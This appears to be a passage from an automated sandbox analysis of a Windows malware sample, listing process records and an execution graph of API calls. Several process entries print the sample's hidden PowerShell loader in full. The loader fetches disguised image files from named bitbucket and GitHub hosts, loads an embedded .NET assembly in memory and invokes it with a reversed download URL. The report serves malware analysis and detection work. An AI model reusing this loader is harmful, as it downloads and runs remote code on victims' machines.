4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$Ew$bwBh$GQ$K$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBo$GM$awBT$Gs$c$Bv$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBy$Hc$cQBl$Hc$cQBm$HE$dwBm$C8$cQBy$GU$d$By$GU$d$By$C8$ZwBy$G8$LgB0$GU$awBj$HU$YgB0$Gk$Yg$n$Cw$I$$n$D$$Jw$s$C$$JwBT$HQ$YQBy$HQ$dQBw$E4$YQBt$GU$Jw$s$C$$JwBN$HM$YgB1$Gk$b$Bk$Cc$L$$g$Cc$M$$n$Ck$KQB9$H0$';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:18:45:53
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:18:45:55
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:31.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:40.6%
                                                                                Total number of Nodes:930
                                                                                Total number of Limit Nodes:48
                                                                                execution_graph 2066 7ff7378258b0 2067 7ff7378258ee 2066->2067 2068 7ff737825904 2066->2068 2069 7ff7378258fc 2067->2069 2070 7ff737825770 CloseHandle 2067->2070 2068->2069 2072 7ff737825a29 2068->2072 2075 7ff73782591a 2068->2075 2122 7ff737828470 2069->2122 2070->2069 2074 7ff737825a35 SetWindowTextA 2072->2074 2076 7ff737825a4a 2072->2076 2074->2076 2075->2069 2078 7ff737825982 DosDateTimeToFileTime 2075->2078 2076->2069 2094 7ff7378251bc GetFileAttributesA 2076->2094 2078->2069 2080 7ff7378259a3 LocalFileTimeToFileTime 2078->2080 2080->2069 2081 7ff7378259c1 SetFileTime 2080->2081 2081->2069 2082 7ff7378259e9 2081->2082 2091 7ff737825770 2082->2091 2087 7ff737825ac1 2113 7ff73782527c LocalAlloc 2087->2113 2090 7ff737825acb 2090->2069 2092 7ff73782578f SetFileAttributesA 2091->2092 2093 7ff7378257a4 CloseHandle 2091->2093 2092->2069 2093->2092 2095 7ff73782525f 2094->2095 2096 7ff7378251de 2094->2096 2095->2069 2101 7ff737825380 2095->2101 2096->2095 2097 7ff737825246 SetFileAttributesA 2096->2097 2130 7ff737827ac8 FindResourceA 2096->2130 2097->2095 2100 7ff73782523c 2100->2097 2102 7ff7378253b3 2101->2102 2103 7ff7378253fd lstrcmpA 2102->2103 2104 7ff7378253d0 2102->2104 2106 7ff7378253f4 2103->2106 2107 7ff737825454 2103->2107 2105 7ff737824dcc 24 API calls 2104->2105 2105->2106 2106->2069 2106->2087 2107->2106 2108 7ff7378254a8 CreateFileA 2107->2108 2108->2106 2110 7ff7378254de 2108->2110 2109 7ff737825561 CreateFileA 2109->2106 2110->2106 2110->2109 2111 7ff737825549 CharNextA 2110->2111 2112 7ff737825532 CreateDirectoryA 2110->2112 2111->2110 2112->2111 2114 7ff7378252aa 2113->2114 2116 7ff7378252d4 2113->2116 2115 7ff737824dcc 24 API calls 2114->2115 2117 7ff7378252cd 2115->2117 2116->2116 2118 7ff7378252e4 LocalAlloc 2116->2118 2117->2090 2118->2117 2119 7ff737825300 2118->2119 2120 7ff737824dcc 24 API calls 2119->2120 2121 7ff737825323 LocalFree 2120->2121 2121->2117 2123 7ff737828479 2122->2123 2124 7ff737825af4 2123->2124 2125 7ff7378284d0 RtlCaptureContext RtlLookupFunctionEntry 2123->2125 2126 7ff737828557 2125->2126 2127 7ff737828515 RtlVirtualUnwind 2125->2127 2185 7ff737828494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2126->2185 2127->2126 2131 7ff737827b63 2130->2131 2132 7ff737827b03 LoadResource 2130->2132 2138 7ff737824dcc 2131->2138 2132->2131 2133 7ff737827b1d DialogBoxIndirectParamA FreeResource 2132->2133 2133->2131 2136 7ff737825228 2133->2136 2136->2095 2136->2097 2136->2100 2139 7ff737824e49 LoadStringA 2138->2139 2153 7ff737825024 2138->2153 2141 7ff737824e73 2139->2141 2142 7ff737824eb5 2139->2142 2140 7ff737828470 7 API calls 2143 7ff737825035 2140->2143 2167 7ff737827f04 2141->2167 2146 7ff737824f31 2142->2146 2147 7ff737824ec1 2142->2147 2143->2136 2146->2146 2150 7ff737824f8e LocalAlloc 2146->2150 2151 7ff737824f44 LocalAlloc 2146->2151 2147->2147 2154 7ff737824eeb LocalAlloc 2147->2154 2148 7ff737824e81 MessageBoxA 2148->2153 2150->2153 2162 7ff737824f2c 2150->2162 2151->2153 2156 7ff737824f79 2151->2156 2153->2140 2154->2153 2158 7ff737824f14 2154->2158 2159 7ff73782114c _vsnprintf 2156->2159 2157 7ff737824fbc MessageBeep 2160 7ff737827f04 13 API calls 2157->2160 2182 7ff73782114c 2158->2182 2159->2162 2163 7ff737824fd3 2160->2163 2162->2157 2164 7ff737824fdc MessageBoxA LocalFree 2163->2164 2165 7ff737827e34 2 API calls 2163->2165 2164->2153 2165->2164 2168 7ff737827f44 GetVersionExA 2167->2168 2177 7ff737828076 2167->2177 2169 7ff737827f6d 2168->2169 2168->2177 2172 7ff737827f90 GetSystemMetrics 2169->2172 2169->2177 2170 7ff737828470 7 API calls 2171 7ff737824e78 2170->2171 2171->2148 2178 7ff737827e34 2171->2178 2173 7ff737827fa7 RegOpenKeyExA 2172->2173 2172->2177 2174 7ff737827fdc RegQueryValueExA RegCloseKey 2173->2174 2173->2177 2176 7ff737828026 2174->2176 2174->2177 2175 7ff737828065 CharNextA 2175->2176 2176->2175 2176->2177 2177->2170 2179 7ff737827e5a EnumResourceLanguagesA 2178->2179 2180 7ff737827edd 2178->2180 2179->2180 2181 7ff737827e9f EnumResourceLanguagesA 2179->2181 2180->2148 2181->2180 2183 7ff737821178 _vsnprintf 2182->2183 2184 7ff737821199 2182->2184 2183->2184 2184->2162 2186 7ff737823910 2187 7ff737823933 2186->2187 2188 7ff737823a09 2186->2188 2187->2188 2190 7ff737823948 2187->2190 2191 7ff737823a11 GetDesktopWindow 2187->2191 2189 7ff737823b1a EndDialog 2188->2189 2194 7ff737823954 2188->2194 2189->2194 2192 7ff73782394c 2190->2192 2193 7ff73782397b 2190->2193 2209 7ff737824c68 6 API calls 2191->2209 2192->2194 2196 7ff73782395b TerminateThread 2192->2196 2193->2194 2197 7ff737823985 ResetEvent 2193->2197 2196->2189 2199 7ff737824dcc 24 API calls 2197->2199 2203 7ff7378239c3 2199->2203 2200 7ff737823a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2201 7ff737823a9b SetWindowTextA CreateThread 2200->2201 2201->2194 2202 7ff737823ae8 2201->2202 2204 7ff737824dcc 24 API calls 2202->2204 2205 7ff7378239e4 SetEvent 2203->2205 2207 7ff7378239cc SetEvent 2203->2207 2206 7ff737823b07 2204->2206 2214 7ff737823b40 2205->2214 2206->2188 2207->2194 2211 7ff737824d3f SetWindowPos 2209->2211 2212 7ff737828470 7 API calls 2211->2212 2213 7ff737823a2f 2212->2213 2213->2200 2213->2201 2215 7ff737823b4c MsgWaitForMultipleObjects 2214->2215 2216 7ff737823b74 PeekMessageA 2215->2216 2217 7ff737823be5 2215->2217 2216->2215 2220 7ff737823b99 2216->2220 2217->2188 2218 7ff737823ba7 DispatchMessageA 2219 7ff737823bb8 PeekMessageA 2218->2219 2219->2220 2220->2215 2220->2217 2220->2218 2220->2219 2221 7ff737825690 2222 7ff737823b40 4 API calls 2221->2222 2223 7ff7378256b1 2222->2223 2224 7ff7378256c2 WriteFile 2223->2224 2226 7ff7378256ba 2223->2226 2225 7ff7378256f9 2224->2225 2224->2226 2225->2226 2227 7ff737825725 SendDlgItemMessageA 2225->2227 2227->2226 2983 7ff7378278b0 2985 7ff7378278fd 2983->2985 2984 7ff737827ba8 CharPrevA 2986 7ff737827935 CreateFileA 2984->2986 2985->2984 2987 7ff73782797e WriteFile 2986->2987 2988 7ff737827970 2986->2988 2989 7ff7378279a2 CloseHandle 2987->2989 2991 7ff737828470 7 API calls 2988->2991 2989->2988 2992 7ff7378279d5 2991->2992 2993 7ff737824a30 2994 7ff737824a39 SendMessageA 2993->2994 2995 7ff737824a50 2993->2995 2994->2995 2996 7ff737823530 2997 7ff737823557 2996->2997 2998 7ff737823802 EndDialog 2996->2998 2999 7ff737823567 2997->2999 3000 7ff73782377e GetDesktopWindow 2997->3000 3006 7ff73782356b 2998->3006 3003 7ff73782357b 2999->3003 3004 7ff737823635 GetDlgItemTextA 2999->3004 2999->3006 3001 7ff737824c68 14 API calls 3000->3001 3002 7ff737823795 SetWindowTextA SendDlgItemMessageA 3001->3002 3005 7ff7378237d8 GetDlgItem EnableWindow 3002->3005 3002->3006 3007 7ff737823618 EndDialog 3003->3007 3008 7ff737823584 3003->3008 3014 7ff73782365e 3004->3014 3028 7ff7378236e9 3004->3028 3005->3006 3007->3006 3008->3006 3009 7ff737823591 LoadStringA 3008->3009 3010 7ff7378235de 3009->3010 3011 7ff7378235bd 3009->3011 3033 7ff737824a60 LoadLibraryA 3010->3033 3017 7ff737824dcc 24 API calls 3011->3017 3013 7ff737824dcc 24 API calls 3013->3006 3016 7ff737823694 GetFileAttributesA 3014->3016 3014->3028 3019 7ff7378236a8 3016->3019 3020 7ff7378236fa 3016->3020 3032 7ff7378235d7 3017->3032 3018 7ff7378235eb SetDlgItemTextA 3018->3006 3018->3011 3021 7ff737824dcc 24 API calls 3019->3021 3023 7ff737827ba8 CharPrevA 3020->3023 3024 7ff7378236cb 3021->3024 3022 7ff73782374b EndDialog 3022->3006 3025 7ff73782370e 3023->3025 3024->3006 3026 7ff7378236d4 CreateDirectoryA 3024->3026 3027 7ff737826b70 31 API calls 3025->3027 3026->3020 3026->3028 3029 7ff737823716 3027->3029 3028->3013 3029->3028 3030 7ff737823721 3029->3030 3031 7ff737826ca4 38 API calls 3030->3031 3030->3032 3031->3032 3032->3006 3032->3022 3034 7ff737824c20 3033->3034 3035 7ff737824aa0 GetProcAddress 3033->3035 3039 7ff737824dcc 24 API calls 3034->3039 3036 7ff737824c0a FreeLibrary 3035->3036 3037 7ff737824ac2 GetProcAddress 3035->3037 3036->3034 3037->3036 3038 7ff737824ae2 GetProcAddress 3037->3038 3038->3036 3040 7ff737824b04 3038->3040 3041 7ff7378235e3 3039->3041 3042 7ff737824b13 GetTempPathA 3040->3042 3047 7ff737824b65 3040->3047 3041->3006 3041->3018 3043 7ff737824b2b 3042->3043 3043->3043 3044 7ff737824b34 CharPrevA 3043->3044 3046 7ff737824b4e CharPrevA 3044->3046 3044->3047 3045 7ff737824bee FreeLibrary 3045->3041 3046->3047 3047->3045 3048 7ff7378233f0 3049 7ff7378234ec 3048->3049 3050 7ff737823402 3048->3050 3051 7ff7378234f5 SendDlgItemMessageA 3049->3051 3054 7ff7378234e5 3049->3054 3053 7ff737823441 GetDesktopWindow 3050->3053 3056 7ff73782340f 3050->3056 3051->3054 3052 7ff737823430 EndDialog 3052->3054 3055 7ff737824c68 14 API calls 3053->3055 3057 7ff737823458 6 API calls 3055->3057 3056->3052 3056->3054 3057->3054 3058 7ff737825870 GlobalAlloc 3059 7ff7378280d0 3061 7ff7378280e2 3059->3061 3066 7ff737828818 GetModuleHandleW 3061->3066 3062 7ff737828149 __set_app_type 3063 7ff737828186 3062->3063 3064 7ff73782819c 3063->3064 3065 7ff73782818f __setusermatherr 3063->3065 3065->3064 3067 7ff73782882d 3066->3067 3067->3062 3068 7ff7378281b0 __getmainargs 3069 7ff737828b30 _XcptFilter 3070 7ff737828750 3071 7ff737828782 3070->3071 3072 7ff73782875f 3070->3072 3072->3071 3073 7ff73782877b ?terminate@ 3072->3073 3073->3071 3074 7ff737828790 SetUnhandledExceptionFilter 3075 7ff737828417 3076 7ff73782842f 3075->3076 3077 7ff737828426 _exit 3075->3077 3078 7ff737828438 _cexit 3076->3078 3079 7ff737828444 3076->3079 3077->3076 3078->3079 3080 7ff7378233a0 3081 7ff7378233bb CallWindowProcA 3080->3081 3082 7ff7378233ac 3080->3082 3083 7ff7378233b7 3081->3083 3082->3081 3082->3083 3084 7ff7378255e0 3085 7ff737825641 ReadFile 3084->3085 3086 7ff73782560d 3084->3086 3085->3086 3087 7ff7378257e0 3089 7ff73782581e 3087->3089 3090 7ff7378257fc 3087->3090 3088 7ff73782583d SetFilePointer 3088->3090 3089->3088 3089->3090 3091 7ff737823840 3092 7ff73782385a 3091->3092 3093 7ff737823852 3091->3093 3094 7ff7378238ec EndDialog 3092->3094 3097 7ff73782385f 3092->3097 3093->3092 3095 7ff73782388e GetDesktopWindow 3093->3095 3094->3097 3096 7ff737824c68 14 API calls 3095->3096 3098 7ff7378238a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3096->3098 3098->3097 3099 7ff737821500 3100 7ff737821557 GetDesktopWindow 3099->3100 3101 7ff737821530 3099->3101 3102 7ff737824c68 14 API calls 3100->3102 3103 7ff737821553 3101->3103 3104 7ff737821542 EndDialog 3101->3104 3105 7ff73782156e LoadStringA SetDlgItemTextA MessageBeep 3102->3105 3106 7ff737828470 7 API calls 3103->3106 3104->3103 3105->3103 3107 7ff7378215d0 3106->3107 2228 7ff737828200 2247 7ff737828964 2228->2247 2232 7ff73782824b 2233 7ff73782825d 2232->2233 2234 7ff737828277 Sleep 2232->2234 2235 7ff73782826d _amsg_exit 2233->2235 2237 7ff737828284 2233->2237 2234->2232 2235->2237 2236 7ff7378282fc _initterm 2238 7ff737828319 _IsNonwritableInCurrentImage 2236->2238 2237->2236 2237->2238 2246 7ff7378282dd 2237->2246 2239 7ff7378283f8 _ismbblead 2238->2239 2240 7ff73782837d 2238->2240 2238->2246 2239->2238 2251 7ff737822c54 GetVersion 2240->2251 2243 7ff7378283c7 exit 2244 7ff7378283cf 2243->2244 2245 7ff7378283d8 _cexit 2244->2245 2244->2246 2245->2246 2248 7ff737828990 6 API calls 2247->2248 2249 7ff737828209 GetStartupInfoW 2247->2249 2250 7ff737828a0f 2248->2250 2249->2232 2250->2249 2252 7ff737822c7b 2251->2252 2253 7ff737822cc3 2251->2253 2252->2253 2254 7ff737822c7f GetModuleHandleW 2252->2254 2275 7ff737822db4 2253->2275 2254->2253 2256 7ff737822c97 GetProcAddress 2254->2256 2256->2253 2258 7ff737822cb2 2256->2258 2258->2253 2259 7ff737822d7f 2261 7ff737822d97 2259->2261 2262 7ff737822d8b CloseHandle 2259->2262 2261->2243 2261->2244 2262->2261 2266 7ff737822d29 2266->2259 2267 7ff737822d5e 2266->2267 2268 7ff737822d33 2266->2268 2271 7ff737822d67 ExitWindowsEx 2267->2271 2272 7ff737822d7a 2267->2272 2270 7ff737824dcc 24 API calls 2268->2270 2273 7ff737822d59 2270->2273 2271->2259 2390 7ff737821c0c GetCurrentProcess OpenProcessToken 2272->2390 2273->2259 2273->2267 2276 7ff737828b09 2275->2276 2277 7ff737822df9 memset memset 2276->2277 2398 7ff737825050 FindResourceExA SizeofResource 2277->2398 2280 7ff737822e53 CreateEventA SetEvent 2281 7ff737825050 7 API calls 2280->2281 2285 7ff737822e92 2281->2285 2282 7ff737824dcc 24 API calls 2284 7ff737822fd9 2282->2284 2283 7ff737822e96 2290 7ff737824dcc 24 API calls 2283->2290 2287 7ff737828470 7 API calls 2284->2287 2285->2283 2286 7ff737822ed5 2285->2286 2288 7ff737822fa3 2285->2288 2289 7ff737825050 7 API calls 2286->2289 2291 7ff737822cd4 2287->2291 2403 7ff7378270a8 2288->2403 2293 7ff737822eec 2289->2293 2294 7ff737822eb4 2290->2294 2291->2259 2321 7ff7378230ec 2291->2321 2293->2283 2296 7ff737822efe CreateMutexA 2293->2296 2294->2284 2296->2288 2299 7ff737822f22 GetLastError 2296->2299 2297 7ff737822fc4 2300 7ff737822fde FindResourceExA 2297->2300 2301 7ff737822fcd 2297->2301 2298 7ff737822fb5 2298->2282 2299->2288 2302 7ff737822f35 2299->2302 2304 7ff737822fff LoadResource 2300->2304 2305 7ff737823014 2300->2305 2430 7ff73782204c 2301->2430 2306 7ff737822f4a 2302->2306 2307 7ff737822f62 2302->2307 2304->2305 2309 7ff737823029 2305->2309 2310 7ff73782301d #17 2305->2310 2308 7ff737824dcc 24 API calls 2306->2308 2311 7ff737824dcc 24 API calls 2307->2311 2312 7ff737822f60 2308->2312 2309->2284 2313 7ff73782303a 2309->2313 2310->2309 2314 7ff737822f7c 2311->2314 2315 7ff737822f81 CloseHandle 2312->2315 2445 7ff737823bf4 GetVersionExA 2313->2445 2314->2288 2314->2315 2315->2284 2320 7ff737827ac8 28 API calls 2320->2294 2322 7ff737823139 2321->2322 2323 7ff737823116 2321->2323 2362 7ff737823236 2322->2362 2575 7ff737825fe4 2322->2575 2325 7ff737823123 2323->2325 2535 7ff7378260a4 2323->2535 2325->2322 2325->2362 2555 7ff737823f74 2325->2555 2331 7ff737828470 7 API calls 2333 7ff737822ce1 2331->2333 2332 7ff73782315b GetSystemDirectoryA 2334 7ff737827ba8 CharPrevA 2332->2334 2365 7ff7378261ec 2333->2365 2335 7ff737823186 LoadLibraryA 2334->2335 2336 7ff7378231c9 FreeLibrary 2335->2336 2337 7ff73782319f GetProcAddress 2335->2337 2338 7ff7378231e4 2336->2338 2339 7ff737823273 SetCurrentDirectoryA 2336->2339 2337->2336 2340 7ff7378231ba DecryptFileA 2337->2340 2338->2339 2343 7ff7378231f0 GetWindowsDirectoryA 2338->2343 2341 7ff73782320d 2339->2341 2342 7ff737823291 2339->2342 2340->2336 2345 7ff737824dcc 24 API calls 2341->2345 2351 7ff7378232fb 2342->2351 2354 7ff7378232cb 2342->2354 2364 7ff73782331f 2342->2364 2343->2341 2344 7ff73782325a 2343->2344 2638 7ff737826ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2344->2638 2347 7ff73782322b 2345->2347 2733 7ff737827700 GetLastError 2347->2733 2348 7ff737823347 2353 7ff737823368 2348->2353 2687 7ff7378240c4 2348->2687 2350 7ff737822318 18 API calls 2350->2348 2665 7ff737825d90 2351->2665 2357 7ff737823383 2353->2357 2353->2362 2358 7ff737827ac8 28 API calls 2354->2358 2355 7ff737823230 2355->2362 2744 7ff73782494c 2357->2744 2359 7ff7378232f6 2358->2359 2359->2362 2734 7ff73782772c 2359->2734 2362->2331 2364->2348 2364->2350 2364->2362 2367 7ff737826214 2365->2367 2366 7ff73782624c LocalFree LocalFree 2366->2367 2367->2366 2369 7ff737826229 SetFileAttributesA DeleteFileA 2367->2369 2375 7ff737826273 2367->2375 2368 7ff737826311 2370 7ff737826387 2368->2370 2372 7ff73782632d RegOpenKeyExA 2368->2372 2369->2366 2371 7ff737828470 7 API calls 2370->2371 2373 7ff737822ce8 2371->2373 2372->2370 2374 7ff73782635e RegDeleteValueA RegCloseKey 2372->2374 2373->2259 2373->2266 2379 7ff737822318 2373->2379 2374->2370 2375->2368 2376 7ff7378262f4 SetCurrentDirectoryA 2375->2376 2377 7ff737827c40 4 API calls 2375->2377 2378 7ff73782204c 16 API calls 2376->2378 2377->2376 2378->2368 2380 7ff737822447 2379->2380 2381 7ff737822330 2379->2381 2975 7ff737822244 GetWindowsDirectoryA 2380->2975 2382 7ff73782233a 2381->2382 2383 7ff7378223cb RegOpenKeyExA 2381->2383 2385 7ff7378223c3 2382->2385 2387 7ff73782234a RegOpenKeyExA 2382->2387 2383->2385 2386 7ff7378223fe RegQueryInfoKeyA 2383->2386 2385->2266 2388 7ff7378223a8 RegCloseKey 2386->2388 2387->2385 2389 7ff73782237d RegQueryValueExA 2387->2389 2388->2385 2389->2388 2391 7ff737821c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2390->2391 2393 7ff737821c4c 2390->2393 2392 7ff737821cec ExitWindowsEx 2391->2392 2391->2393 2392->2393 2394 7ff737821c68 2392->2394 2395 7ff737824dcc 24 API calls 2393->2395 2396 7ff737828470 7 API calls 2394->2396 2395->2394 2397 7ff737821d1a 2396->2397 2397->2259 2399 7ff737822e43 2398->2399 2400 7ff73782509b 2398->2400 2399->2280 2399->2298 2400->2399 2401 7ff7378250a4 FindResourceA LoadResource LockResource 2400->2401 2401->2399 2402 7ff7378250e3 memcpy_s FreeResource 2401->2402 2402->2399 2404 7ff737827566 2403->2404 2428 7ff7378270f2 2403->2428 2405 7ff737828470 7 API calls 2404->2405 2407 7ff737822fb1 2405->2407 2406 7ff7378271ca 2406->2404 2409 7ff7378271e7 GetModuleFileNameA 2406->2409 2407->2297 2407->2298 2408 7ff73782711d CharNextA 2408->2428 2410 7ff73782721c 2409->2410 2411 7ff73782720f 2409->2411 2410->2404 2479 7ff737827d68 2411->2479 2413 7ff7378276f1 2488 7ff737828648 RtlCaptureContext RtlLookupFunctionEntry 2413->2488 2416 7ff737827238 CharUpperA 2417 7ff73782766f 2416->2417 2416->2428 2418 7ff737824dcc 24 API calls 2417->2418 2419 7ff737827692 2418->2419 2420 7ff7378276aa ExitProcess 2419->2420 2421 7ff73782769e CloseHandle 2419->2421 2421->2420 2422 7ff73782739d CharUpperA 2422->2428 2423 7ff737827346 CompareStringA 2423->2428 2424 7ff7378273fb CharUpperA 2424->2428 2425 7ff737827492 CharUpperA 2425->2428 2426 7ff7378272d0 CharUpperA 2426->2428 2427 7ff737827ce8 IsDBCSLeadByte CharNextA 2427->2428 2428->2404 2428->2406 2428->2408 2428->2413 2428->2416 2428->2422 2428->2423 2428->2424 2428->2425 2428->2426 2428->2427 2484 7ff737827ba8 2428->2484 2431 7ff737822213 2430->2431 2432 7ff737822086 2430->2432 2433 7ff737828470 7 API calls 2431->2433 2435 7ff7378220dc FindFirstFileA 2432->2435 2434 7ff737822222 2433->2434 2434->2284 2435->2431 2443 7ff7378220fe 2435->2443 2436 7ff737822138 lstrcmpA 2438 7ff737822158 lstrcmpA 2436->2438 2439 7ff7378221d9 FindNextFileA 2436->2439 2437 7ff7378221a3 2440 7ff7378221b4 SetFileAttributesA DeleteFileA 2437->2440 2438->2439 2438->2443 2441 7ff7378221f5 FindClose RemoveDirectoryA 2439->2441 2439->2443 2440->2439 2441->2431 2442 7ff737827ba8 CharPrevA 2442->2443 2443->2436 2443->2437 2443->2439 2443->2442 2444 7ff73782204c 8 API calls 2443->2444 2444->2443 2450 7ff737823c59 2445->2450 2452 7ff737823c4f 2445->2452 2446 7ff737824dcc 24 API calls 2447 7ff737823f05 2446->2447 2448 7ff737828470 7 